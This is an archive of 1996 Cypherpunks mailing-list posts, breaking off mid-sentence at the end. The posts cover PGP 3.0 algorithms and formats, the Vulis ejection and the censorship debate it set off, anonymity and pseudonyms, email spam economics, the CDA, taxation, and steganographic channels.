> how many foodstuffs cost _more_ up here, as well as the obvious fact that
> many are harder to get...  Junk food and cheap liquor are everywhere,
> though...

I spent a few years living in Columbia housing on 111th St and there are
plenty of good, cheap groceries around. If you choose to save on the rent
and to live, e.g., up by City College, then indeed there are fewer groceries
and they cost more. The clerks who work there also get paid much more than
the clerks midtown because they risk their lives.
And you spend more time commuting to Columbia.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 13 Nov 1996 10:24:13 -0800 (PST)
To: dthorn@gte.net (Dale Thorn)
Subject: Re: Information [for new PGP user]
In-Reply-To: <3284BF7A.36E0@gte.net>
Message-ID: <199611131840.MAA01754@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> Paul Bradley wrote:
> > > >I'll bet you can't find 10 out of 1,000 users who have read the total source,
> > > may not function as expected.
> > compile on my system with the borland makefile than comes with PGP.
>Yet another success (NOT!) story for PGP.  I wonder how many people on this list
>would be willing to bet something *really* important to them on the security of PGP?

     I'd have more trouble trusting the Loose Nut on the other end than the
software. 
 
     Security is more than the software, it is picking proper Pass Phrases
(which I am not too sure about), it is keeping the keys where it is less
than easy to get at, it is making sure the machine isn't compromised etc. 

     Also, I ask you once again, Could you please format your email to 
under 80 columns? You might have something valuable to say, but I can't 
stand to read any of your posts more than 2 or 3 lines because of the 
way the lines break. 

     Thank you.


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Vogler <tvo@software-ag.de>
Date: Wed, 13 Nov 1996 03:40:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Q: where is `/etc/passwd' on WindowsNT
Message-ID: <199611131141.MAA14539@suncool1.software-ag.de>
MIME-Version: 1.0
Content-Type: text/plain


hi all,

i am looking on information where WindowsNT stores its database of
hashed passwords (in the registry ? below the key
\\hklm\security\sam\domains\account\users ?) and how they are stored /
hashed (md4 ?) ?

any information welcome...

ttfn

thomas

-- 
+-----------------------------------------------------------------------------+
| jolifanto bambla o falli bambla / gro_iga m'pfa habla horem / egiga         |
| goramen / higo bloiko russula huju / hollaka hollala / anlogo bung / blago  |
| bung blago bung / bosso fataka / | || | / schampa wulla wussa olobo / hej   |
| tatta gorem / eschige zunbada / wulubu ssubudu uluwu ssubudu / tumba ba-umf |
| / kusa gauma / ba - umf                            // hugo ball, 'karawane' |
+-----------------------------------------------------------------------------+
| Thomas Vogler, tvo@software-ag.de,  http://pcool/~tvo/                      |
|-----------------------------------------------------------------------------+
| Phone: [49]-(6151)-92-2484                         FAX: [49]-(6151)-92-2610 |
+-----------------------------------------------------------------------------+
| statements in here are my own and not neccesarily those of my employer      |
+-----------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 17:43:56 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <3.0b36.32.19961112154157.00766b84@panix.com>
Message-ID: <199611130143.MAA24956@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 13 Nov 1996 10:27:40 -0800 (PST)
To: ph@netcom.com (Peter Hendrickson)
Subject: Re: Black Unicorn exposed?
In-Reply-To: <v02140b03aeaa71ed1c84@[192.0.2.1]>
Message-ID: <199611131843.MAA01765@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 11:00 AM 11/9/1996, Robert Hettinga wrote:
> > S. L. vonBernhardt, <mailto:unicorn@schloss.li>,...
> Black Unicorn recently stated that had taken measures to shield
> his identity so that people would be unable to cause harm to
> his professional activities by making unsubstantiated claims
> that could scare off prospective clients.
> It appears now that this protection has evaporated.  It will not
> be very hard in the future to put this information together with
> other statements people may make about Mr. Unicorn.
> We are hardly operating in a hostile environment.  Yet, somebody
> who has apparently gone to some effort to have an anonymous
> identity has been exposed.  The implications of this are worth
> considering.

     You, and others are assuming that S. L. von Bernhardt is his 
real name. Many many levels of deception are possible. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 17:47:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <v0300780daeae49989465@[206.86.1.35]>
Message-ID: <199611130147.MAA25078@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 17:49:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <Pine.LNX.3.93.961112081635.2801B-100000@web.wa.net>
Message-ID: <199611130148.MAA25145@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Wed, 13 Nov 1996 12:53:48 -0800 (PST)
To: "Vladimir Z. Nuri" <cypherpunks@toad.com
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
Message-ID: <199611132053.MAA05389@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:31 PM 11/12/96 -0800, Vladimir Z. Nuri wrote:
...
>actually, there are some amusing things going on here with cpunk
>"rules." are cpunks in favor of pseudonyms or not? one famous
>cpunk madman wrote under a pseudonym to the list, and many
>cypherpunk went to great lengths to try to derive his identity.
>is this a case of respecting pseudonyms? or is it more a case of
>the double standard at best, hypocrisy at worst, 
>"respect my pseudonyms, but yours are fair game"?  
...
Cypherpunks try to break each others crypto as well, in an attempt to evolve
crypto to the point that it is not crackable.  Perhaps you would like to
make pseudonyms easier to protect.  If you developed a pseudonym and gave it
its own public/private key pair, and if people bothered to check your
signatures with the appropiate sources, then you should be able to protect
it.  Of course, I just assume that those on the list are who they say they
are, I have e-mail access on the schools LAN, and PGP on the machine in my
room.  There is an air gap between the two, so getting a key requires a two
way trip.  I may start validating in the future, but I don't now.  The point
I was trying to make is, is "cracking" of pseudonyms any different than
cracking of algorythims?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@ATHENA.MIT.EDU>
Date: Wed, 13 Nov 1996 10:04:54 -0800 (PST)
To: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
Subject: Re: PGP3.0 & ElGamal
In-Reply-To: <A81C16F0582@frw3.kub.nl>
Message-ID: <199611131804.NAA26899@charon.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


hi,

> > Also I understand, though there appears to be no available
> > documentation saying as much, that pgp3.0 will not use RSA, nor IDEA,
> > nor MD5, using instead El Gamal for public key encryption and
> > signatures, 3DES (unsure?), and SHA1.
> 
> Can someone confirm that PGP3.0 will use ElGamal?

The PGP 3.0 code that I've been working on has support for:
	IDEA, 3DES
	MD5, SHA1
	RSA, DSS, ElGamal

It does not discontinue support for the PGP 2.6.2 algorithms.  It adds
support for new ones.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 13 Nov 1996 13:13:22 -0800 (PST)
To: Dave Hayes <dave@kachina.jetcafe.org>
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <199611131951.LAA16239@kachina.jetcafe.org>
Message-ID: <Pine.GSO.3.95.961113122648.8294B-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


I am amused. I gave Dave Hayes about an 8.5 out of 10 on the scale of
meaningless political rants.

I'll address some of his points.

* "Political safety?" I stand by my record as a writer. Check out
http://www.eff.org/pub/Publications/Declan_McCullagh/ for some of my
recent articles. Political safety? Hardly.

* Dave says "Notice that the net is compared to a home or private club." 
Wrong. I never compared the Net to such. However, a mailing list run on a
computer in someone's home with his own cash is very similar to a private
club.  There are private speech restrictions on the Net. Gated communities
exist.  Try to join the "lawprofs" mailing list. You can't; you're not
(and quite obviously anything but) a law professor. Censorship? Not quite. 

* Contrary to what you seem to be asserting, Gilmore hasn't blocked Vulis
from posting. 

* Dave warns us to consider "what would happen if one parent company owned
*all* communications media." Then we have problems. I've written about
this in an Internet Underground magazine column. However, this is not the
case now. Or are you arguing the government should get involved and force
Gilmore to allow Vulis on his list?

By the way, if you haven't figured it out yet, Mr. "Freedom Knight of
Usenet,"  a private mailing list is NOT Usenet. Get a clue. 

-Declan






On Wed, 13 Nov 1996, Dave Hayes wrote:

> [This is a rebuttal to a misguided news article.]
> 
> > Cypher-Censored
> > By Declan McCullagh (declan@well.com)
> 
> Thank you for leaving your email address. It makes this easier.
> 
> You people (read: the unaware and hypnotized masses, which includes
> reporters who's desire for attention and political safety holds them
> in line with the consensual illusion) keep missing the real issue, and
> substituting issues which only hold themselves in place.
> 
> [Those of you who know, please excuse the mediaistic terms used in
> this rebuttal. One must use the symbols one is given to communicate
> at the level of understanding of those who use them.]
> 
> >        Thus began a debate over what the concept of censorship means in a
> >    forum devoted to opposing it. Did Gilmore have the right to show Vulis
> >    the virtual door? Or should he have let the ad hominem attacks
> >    continue, encouraging people to set their filters accordingly? The
> >    incident raises deeper questions about how a virtual community can
> >    prevent one person from ruining the forum for all and whether only
> >    government controls on expression can be called "censorship."
> 
> "Cyberspace" is interacted with using tools under the control of the
> interactor. 
> 
> In person-to-person interaction, one's only real defense against what
> one decides to call "unwanted" is to remove oneself from the arena of
> interaction. It may not be possible to ignore or run away from certain
> sources of input. 
> 
> In cyberspace, however, it is not only possible but necessary and even
> desirable. Cyberspace allows one to interact with many more people
> then can fit in any given physical space. One simply -cannot- receive
> input from 2000 people and not employ some sort of filtering
> mechanism. Indeed, cyberspace has many buttons and switches (and even
> programmatic filters) which allow one to -completely- control whom one
> interacts with.
> 
> Logically, we must conclude that those who frequently and repeatedly
> cry for the censorship or removal of any source of input from
> cyberspace are either:
> 
> 	-quite clueless about the tools at their disposal
> 	-ideologically or personally opposed to the source of input
> or	-in need of large amounts of attention from others
> 
> Cluelessness can be overcome by appropriate teaching and interest in
> learning (the latter issue we can safely assume users of popular but
> ineffectual windowing OSes are not able to overcome). Such
> cluelessness, however, is not and should never be a reason for 
> censorship.
> 
> A need for attention can be overcome by refraining from the denial
> that the need exists, followed by careful observation of that need. 
> More can be said on this, but this is not the forum. Such a need
> is not and should never be a reason for censorship. 
> 
> Idelological opposition is another matter entirely. To understand this
> better, we'll need to observe this in action. Here is an example:
> 
> >        Vulis portrays himself as a victim, but as I posted to the list
> >    last week, I disagree. Anyone who's spent any time on the
> >    100-plus-messages-a-day list can read for themselves the kind of nasty
> >    daily messages that came from Vulis's keyboard. 
> 
> "Nasty" is, of course, by this reporter's standard of "nasty". Granted
> this standard may in fact be shared by Mr. Gilmore, however a shared
> standard is not necessarily an appropriate or correct standard. 
> 
> >    The list is on Gilmore's machine and he can do what he wants with
> >    it; he can moderate the postings, he can censor material, he can
> >    shut the whole thing down. By kicking off an offending user, a
> >    list owner merely exercises his property right. There's no
> >    government involvement, so the First Amendment doesn't apply. And
> >    the deleted, disgruntled user is free to start his own mailing
> >    list with different rules.
> 
> Notice how, once the opposition is admitted to, the rationalization
> begins. Suddenly this is not a matter of censorship, but of ownership.
> Just as suddenly, the classic anti-free-speech arguments of "if you
> don't like it, start yer own" begin to surface. (Anyone ever notice
> how this resembles the "love it or leave it" mentality of certain
> American patriotic organizations?)
> 
> What would ideological opposition be without the attempt at analogy? 
> Here we witness another example:
> 
> >        But then the question is whether Gilmore should have exercised
> >    that right, especially in such an open forum. Again, I think Gilmore's
> >    actions were justified. Consider inviting someone into your home or
> >    private club. If your guest is a boor, you might ask him to leave. If
> >    your guest is an slobbish drunk of a boor, you have a responsibility
> >    to require him to leave before he ruins the evening of others.
> 
> Notice that the net is compared to a home or private club. Actually
> the net is neither, however that would not serve the purposes of this
> analogy, so this fact is convienently forgotton. 
> 
> The net is a wonderful place. Any ideology, no matter who disagrees or
> agrees with it, can be expressed and discussed here...assuming those
> who oppose this ideology do not have their way with the source of
> expression. There is a more refined and deeper truth to be found
> in the very existence of the set of all human ideologies, which is
> just beginning to show itself to some netizens. Unfortunately, this
> truth can be ruined when people equate some notion of value to 
> sources which ignore all but a tiny subset of the set of all ideologies:
> 
> >        Eugene Volokh, a law professor at UCLA, runs a number of mailing
> >    lists and has kicked people off to maintain better editorial control.
> >    Volokh says that the most valuable publications are those that
> >    exercise the highest degree of editorial control.
> 
> Value to whom and for what? If the editorial control produces one
> small element of the set of all ideologies, then this is only of value
> to the people who support this ideology. Given that the set of 
> people who support an issue is smaller than the set of people
> who support and oppose an issue, would the value not increase
> by allowing both sides of an issue equal speaking time? 
> 
> >        For his part, Gilmore calls removing the Russian mathematician "an
> >    act of leadership." He says: "It said we've all been putting up with
> >    this guy and it's time to stop. You're not welcome here... It seemed
> >    to me that a lot of the posts on cypherpunks were missing the mark.
> >    They seemed to have an idea that their ability to speak through my
> >    machine was guaranteed by the Constitution."
> 
> It is sad to note that this is the leader of one of America's
> forerunning organizations of freedom who says these words. For all
> *his* ideology of free speech, this statement reveals the hypocrasy he
> lives with for all to see. The true litmus test of free speech is to
> encounter speech that you *want* to censor.
> 
> Mr. Gilmore, and other like minded parties, might want to consider
> what would happen if one parent company owned *all* communications
> media. Would they they be so supportive of the ideology of ownership
> and communciation they espouse?
> ------
> Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
> Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet
> 
> Truth (n.) - the most deadly weapon ever discovered by humanity. Capable 
> of destroying entire perceptual sets, cultures, and realities. Outlawed 
> by all governments everywhere. Possession is normally punishable by death.
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Benjamin Grosman <bgrosman@healey.com.au>
Date: Tue, 12 Nov 1996 18:18:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: Code of Practice for the Internet
Message-ID: <2.2.32.19961113231551.00738c60@healey.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Dear All,

Found something I thought you all might find interesting.....

www.intiaa.asn.au/codeintro.htm

A body in Australia is attempting to introduce a "Code of Practice" in Australia

Yours Sincerely,

Benjamin Grosman





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Wed, 13 Nov 1996 04:19:02 -0800 (PST)
To: raph@cs.berkeley.edu
Subject: Re: pgp3
Message-ID: <199611131217.NAA19213@internal-mail.systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


> Gary Howland wrote:
> > 
> > > Someone suggested to me that Derek posted a draft spec for PGP 3.0.
> > > Anyone know of the whereabouts of this document.
> > 
> > Yes.  That document has evolved to RFC 1991:
> > 
> > 1991  I   D. Atkins, W. Stallings, P. Zimmermann, "PGP Message Exchange
> >            Formats", 08/16/1996. (Pages=21) (Format=.txt)

Hmm - I don't know I managed to make this post - I had started writing
a reply, but exited my mailer, and for some reason it decided to send a
cut down version of the unfinished mail anyway ...

> Nope. This RFC is merely a rehash of the pgformat.doc file in the PGP
> 2.6.? distribution. I'm doing an independent implementation of the PGP
> 2.6 message formats, and found this document unclear in a few spots. For
> example, can anyone else figure out the weird CFB variant mode from this
> document? I used a debugger on the PGP code to help me figure it out.

Exactly - I spent ages on the same thing.  Then there's the problem that
packet length headers must be specific lengths for various types (eg.
key certificates must have a 2 byte length, even if only one is required).
It is also not clear what the exported key certificates should contain,
the spec simply mentioning that there should be no trust packets etc. etc.

> The PGP 3.0 "spec" that you're referring to is actually a draft for a
> PGP library API. A couple of those got circulated on some PGP mailing
> lists, but none have been publicly released, another example of the
> secrecy surrounding the whole PGP effort.
>
> Now that PGP Inc. is happening, it's not exactly clear whether the PGP
> 3.0 release is going to include an API closely resembling these drafts.

I agree with your comments.  For example, we are developing PGP compatible
libraries in both Perl and Java, and are going to add SHA, Blowfish, T-DES,
etc., along with a better key ring format, encrypted key rings, and features
such as key generation from a passphrase, and we would very much like to
remain compatible with the new PGP, but how can we when there is so little
information available?  I think we need a forum to discuss PGP development
issues - I would be happy to set one up if there was interest.

Best regards,

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 18:19:43 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <3.0b36.32.19961112110803.0075a02c@panix.com>
Message-ID: <199611130219.NAA25444@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Butler, Scott" <SButler@chemson.com>
Date: Wed, 13 Nov 1996 05:25:07 -0800 (PST)
To: "'IMCEAX400-c=GB+3Ba=+20+3Bp=CHEMSON+3Bo=CSH+3Bdda+3ASMTP=CYPHERPUNKS+40TOAD+2ECOM+3B@chemson.com>
Subject: FW: Returned mail: User Unknown
Message-ID: <c=GB%a=_%p=CHEMSON%l=CSH_NT0-961113132104Z-4298@csa-ntx.chemson.com>
MIME-Version: 1.0
Content-Type: text/plain




>
>>The address you mailed to is no longer valid.
>>This is probably because the user in question was an
>>old Open Net subscriber. Open Net is NO LONGER an ISP,
>>and has not been since May 1996.
>
>>We have no redirection address for that user. Please
>>remove them from any mailing lists you might have.
>
>>This response was generated automatically.
>
Can whoever is responsible for this please........STOP IT !

Thanx
ScOtT
>;-D




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Wed, 13 Nov 1996 13:22:13 -0800 (PST)
To: Sean Roach <roach_s@alph.swosu.edu>
Subject: Re: Exon Countdown Clock and farewell messages
In-Reply-To: <199611132008.MAA23543@eff.org>
Message-ID: <Pine.SUN.3.91.961113132041.26376B-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


If Exon had understood the Internet, he would have wanted to control it 
even more. Worse yet, his staff would have drafted a CDA more likely to 
pass constitutional muster.

-Declan


On Wed, 13 Nov 1996, Sean Roach wrote:

> At 09:59 AM 11/8/96 -0800, Michael Page wrote and Rich Graves forwarded:
> 
> >> ...
> >> >We would attempt to send it via a Email, but the respected Senator does not
> >> >have Email. (The Irony).
> >> ...
> 
> To Which, on Mon, 11 Nov 1996, I wrote:
> 
> >> There is no irony here, Mr. Exon tried to control the internet for the very
> >> reason that he didn't understand it and one of his granddaughters did.
> >> Perhaps if he did understand the internet then he wouldn't be a threat.
> >> Remember, people fear that which they don't understand.
>  
> To which, at 07:57 PM 11/12/96 -0800, Declan McCullagh wrote:
> 
> >I disagree. I think people understand the printing press and still want 
> >to control it. Morality police are morality police, no matter what the 
> >medium or how well they understand it.
> 
> A valid point, and Exon may have had designs of media control the whole
> time.  The methods he used and the arguments he stated, however, suggested
> to me, that he was someone who did not comprehend the technology.  Those who
> he was able to sway with the dossier of .GIF's certainly were ignorant, many
> of them were turned by that one display of images.
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Wed, 13 Nov 1996 13:24:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: [NONCRYPTO] Re: cypher-censored the netly news
Message-ID: <199611132124.NAA27214@well.com>
MIME-Version: 1.0
Content-Type: text/plain



>Cypher-Censored
>By Declan McCullagh (declan@well.com)
                                       
>The cypherpunks mailing list, so legend goes, coalesced around two
>principles: the dissemination of strong encryption and an absolute
>commitment to free speech.

Incorrect, Cryptography and the promotion of privacy by use of
same.

Not "Free Speech."

>Thus began a debate over what the concept of censorship means in
>a forum devoted to opposing it. 

<sigh> see above.

>Did Gilmore have the right to show Vulis the virtual door? 

Yes


>But what if your private club's express purpose is to cherish free
>speech? 

Again see above, this is not a stated purpose of this list.

   
>What does Vulis's ouster mean to the community that sprang up
>around this mailing list, of which he had been a member for
>nearly three years? 

Dimitri's been here three years?

>Will Rodger from Inter@ctive Week and Lewis Koch from Upside
>Magazine are writing about this.)

I can hardly wait (insert dripping sarcasm).


It still seems people are confusing a benevolent dictatorship with
some sort of democracy. Cypherpunks is just a list, a tiny, tiny
portion of a small corner of the Internet. John started it (with
Tim, Eric and others) and John owns it, no big deal. 

Dimitri was kicked out of John's "Virtual Living Room" after daring
him to do so. We can all still hear his screeching from out on the
virtual sidewalk.

To those who call this censorship I say "To a man who only has a
hammer, every problem resembles a nail."

I do admire Declan's efforts however, please keep up the good work.

Brian

"When catapults are outlawed only outlaws will have catapults."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Hayes <dave@kachina.jetcafe.org>
Date: Wed, 13 Nov 1996 13:33:46 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
Message-ID: <199611132131.NAA16681@kachina.jetcafe.org>
MIME-Version: 1.0
Content-Type: text/plain


> I am amused. I gave Dave Hayes about an 8.5 out of 10 on the scale of
> meaningless political rants.

Is this another way of saying you do not understand, since you
can attribute no meaning? 

> * "Political safety?" I stand by my record as a writer. Check out
> http://www.eff.org/pub/Publications/Declan_McCullagh/ for some of my
> recent articles. Political safety? Hardly.

It never ceases to amaze me how human beings think in terms of
indoctrination and repetition. (Isn't that repetitive too?) 

In this example, previous works are cited as reasons why a current
work is or is not something. As most people in probability theory can
tell you, the chance of something being true has nothing to do with
the results of previous trials. 

In other words, your record is irrelavent. I calls 'em as I sees 'em.

> * Dave says "Notice that the net is compared to a home or private club." 
> Wrong. I never compared the Net to such. However, a mailing list run on a
> computer in someone's home with his own cash is very similar to a private
> club.  

And you say you aren't comparing the net to a home or club? Aren't 
mailing lists on the net? Aren't you comparing them to a club? 
Or are you merely being unclear about your comparisons? 

> * Contrary to what you seem to be asserting, Gilmore hasn't blocked Vulis
> from posting. 

What seems to be often isn't. I am not asserting any such thing. In
fact, Mr. Gilmore hasn't done anything of note since Vulis still gets
mail off the list...it's more symbolic. Interestingly enough, the only
"damage" I see is to Mr. Gilmore's reputation. This is hardly a loss
in my opinion, but I assume it means something to a reporter...

> * Dave warns us to consider "what would happen if one parent company owned
> *all* communications media." Then we have problems. I've written about
> this in an Internet Underground magazine column. However, this is not the
> case now. 

It does not have to be the case for you to see the intended point,
which you apparently missed. I'll say it again: Ownership should not
be a license for censorship. 

> Or are you arguing the government should get involved and force
> Gilmore to allow Vulis on his list?

No. That would be the same thing in a different guise. Please read my
article again and attempt to comprehend what I am saying. It would
truly help your comprehension if you failed to react in a Pavlovian
manner to it.

> By the way, if you haven't figured it out yet, Mr. "Freedom Knight of
> Usenet,"  a private mailing list is NOT Usenet. Get a clue. 

The clue to be gotten is yours. I never implied or intended such a
misunderstanding.
------
Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet

A philosopher called on Nasrudin and found him away from home. Infuriated, 
he wrote 'Stupid Oaf' on his door. As soon as Nasrudin got home and saw this,
he rushed to the philosopher's house. "I'd forgotten", he said, "that you 
were to call. And I apologize for not having been at home. I remembered 
our appointment as soon as I saw that you'd left your name on my door..."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 13 Nov 1996 13:32:42 -0800 (PST)
To: Peter Hendrickson <ph@netcom.com>
Subject: RE: Remailer Abuse Solutions
In-Reply-To: <v02140b00aeafa0bb0e9f@[192.0.2.1]>
Message-ID: <Pine.3.89.9611131359.A27151-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Nov 1996, Peter Hendrickson wrote:

> At 10:34 AM 11/13/1996, Mullen Patrick wrote:
> > Also,
> > what happens when your long-lost friend comes across your addy and tries to
> > email you?  Surely you don't want to charge postage for an otherwise free
> > service to him/er.  Maintaining a list of "accepted sources" would be a hassle
> > not many people would accept.
> 
> Absent highly intrusive global net monitoring techniques, that's what they
> are going to have to do anyway.  E-mail is inexpensive.  The advertiser
> can justify the expense even if generates a small number of leads.  Expect
> more spam.

There is a very simple way of dealing with your long lost friend. And any 
other person not on your "free" list. If you find their email worth your 
while, you can always give them their money back. For future contact, you 
can move your friend on the "free" list.

Frankly, I don't think there is anybody new that I care to communicate with 
who wouln't be willing to make a small deposit for initiating communications.

-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Member JPFO. "America's Aggressive Civil Rights Organization"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 18:39:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <v0300780caeae94c77bd4@[206.119.69.46]>
Message-ID: <199611130239.NAA25657@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Wed, 13 Nov 1996 04:39:26 -0800 (PST)
To: reagle@rpcp.mit.edu
Subject: Re: Taxation Thought Experiment
Message-ID: <199611131240.NAA19255@internal-mail.systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


> o TAXES THOUGHT EXPERIMENT
> 
>  1) I generate $100 of productivity for my company
>  2) Company is taxed %30, $70 left
>  3) Company pay shareholders and costs, $30 is left
>  4) Company pays me
>  5) I pay 40% in taxes, so $18 left
>  6) With $18 I can buy a $16.82 object (%07 sales tax).
> 
> Results:
>  1) I see $16.82 realization from $100 productivity increase.
>  * Govt. gets $49.26 of my productivity, or nearly 3 times the amount I get.

The government gets $59.26, not $49.26 (30+16+12+1.26).
That leaves you with 16.74 (not 16.82) - they get nearly four
times as much.

In other countries the situation may be worse, not only due to different
rates of tax, but because of social security contributions, employers tax,
and the like.

Then if you spend your money on beer or fags, you may be paying even
more tax, due to taxes on alcohol and tobacco, leaving the government
with perhaps 10 times as much money as you.  Many imported goods also have
a tax on them (eg. motorcycle import tax is around 50% in the UK).


It is probably more fun to do these calculations without involving
the shareholders, since they are, after all, earning their "cut".

[ Crypto relevance? Assasination taxation? ]

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 13 Nov 1996 12:05:50 -0800 (PST)
To: ph@netcom.com
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <v02140b06aeada4b1925d@[192.0.2.1]>
Message-ID: <199611131344.NAA00283@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



> > Once you've bootstrapped to your cryptoanarchists toolkit, you can
> > have anything you want, even a virtual TCP/IP layer, a hidden level of
> > TCP/IP in stego data.  TCP/IP itself is a likely candidate for a stego
> > carrier.  Non-predictable sequence nos are required to stop things
> > like the spoofing attack, and so are perfectly plausible.
> 
> > Once we get to everyone having enough bandwidth, lots of people with
> > permanent connections, lots of people using video conference software,
> > audio, downloading feature length films, etc. there's no stopping
> > crypto anarchy.  The LSbits in that lot would make a fairly responsive
> > subliminal channel by todays standards.
> 
> I am finding this all very persuasive, although I am still suspicious
> of stegonagraphy.

The above presumes that you can plausibly use good quality random
number generators.  You need to because that is the problem
specification: you need the TCP sequence nos to be unpredictable.

However, playing along with possible LE avenues of attack, one avenue
of attack might be to require strong PRNG seeds to be handed over to
the Feds.  Or more specifically they might require that anything
computer generated which was unpredicatable to be made predicatable
for the government.

Still it seems unlikely that all subliminal channels could be blocked,
and you still have inherently noisy text, audio, and image files.

> It would be cool to have an exact specification and working machine.
> 
> This might even be easy enough to operate that non-technical people
> could learn how to do it, which implies that there could be large
> numbers of practicing cryptoanarchists.

A very good idea.  There was some discussion of this kind of thing a
